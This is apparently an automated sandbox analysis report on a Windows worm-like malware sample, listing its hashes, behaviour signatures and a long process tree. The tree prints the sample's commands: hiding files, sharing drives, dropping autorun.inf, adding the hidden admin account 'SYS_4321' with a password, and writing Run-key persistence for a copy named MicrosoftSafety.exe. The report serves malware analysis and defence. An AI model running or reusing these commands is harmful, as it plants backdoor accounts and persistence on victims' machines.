Analysis
-
max time kernel
152s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
11/04/2024, 07:44
General
-
Target
ecea035951694789b7184c14e9af81f6_JaffaCakes118.exe
-
Size
104KB
-
MD5
ecea035951694789b7184c14e9af81f6
-
SHA1
09ac039ded11ba32c2a481cd51cab3af1d11669d
-
SHA256
3ae6b1db7c6ff2fde1abd5f707c51f7d737a58820c28461583b510b66b0bb7b1
-
SHA512
44439f93c4da0b4b623555c4a7006e319814a8a49a7eafa441d8c96304f621b9eca143f4c1af8574f41741e19e88cf4fb1f63ecc8b7785d59c59151f9644f1ce
-
SSDEEP
1536:Tz43i6EJ02LyV3kFdp+0zI1ZBjhRDmmHeIcinLJcoHQHF3i6EJ02LyV3rE:TzLyV3kF21im+YLzLyV3I
Score
10/10
Malware Config
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 19 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 19 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Sets file to hidden 1 TTPs 9 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Adds Run key to start application 2 TTPs 37 IoCs
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 29 IoCs
-
Runs net.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 11 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ecea035951694789b7184c14e9af81f6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\ecea035951694789b7184c14e9af81f6_JaffaCakes118.exe"1⤵
- Drops autorun.inf file
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +H "C:\Users\Admin\AppData\Local\Temp\ecea035951694789b7184c14e9af81f6_JaffaCakes118"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +s +H "C:\Users\Admin\AppData\Local\Temp\ecea035951694789b7184c14e9af81f6_JaffaCakes118"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b /max .2⤵
- Modifies registry class
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c tskill taskmagr2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cd C:\ & del *.lnk2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net share SYS_C$=C:\2⤵
-
C:\Windows\SysWOW64\net.exenet share SYS_C$=C:\3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share SYS_C$=C:\4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c MKDIR "C:\Program File"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c MKDIR "C:\Program File\Microsoft"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\ecea035951694789b7184c14e9af81f6_JaffaCakes118.exe" "C:\Program File\Microsoft\MicrosoftSafety.exe"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +H "C:\Program File"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +H "C:\Program File"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +H "C:\Program File\Microsoft"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +H "C:\Program File\Microsoft"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +H C:\C0MM2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +H C:\C0MM3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +H C:\C0MM\C0MM2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +H C:\C0MM\C0MM3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib -r -a C:\autorun.inf2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -r -a C:\autorun.inf3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r C:\autorun.inf2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cd F:\ & del *.lnk2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net share SYS_F$=F:\2⤵
-
C:\Windows\SysWOW64\net.exenet share SYS_F$=F:\3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share SYS_F$=F:\4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +H F:\C0MM2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +H F:\C0MM3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +H F:\C0MM\C0MM2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +H F:\C0MM\C0MM3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib -r -a F:\autorun.inf2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -r -a F:\autorun.inf3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r F:\autorun.inf2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r F:\autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net users /add SYS_4321 passPass2⤵
-
C:\Windows\SysWOW64\net.exenet users /add SYS_4321 passPass3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 users /add SYS_4321 passPass4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net users SYS_4321 passPass2⤵
-
C:\Windows\SysWOW64\net.exenet users SYS_4321 passPass3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 users SYS_4321 passPass4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net localgroup administrators /add SYS_43212⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administrators /add SYS_43213⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators /add SYS_43214⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " %homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f3⤵
- Modifies visiblity of hidden/system files in Explorer
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f3⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
- Modifies visibility of file extensions in Explorer
-
-
-
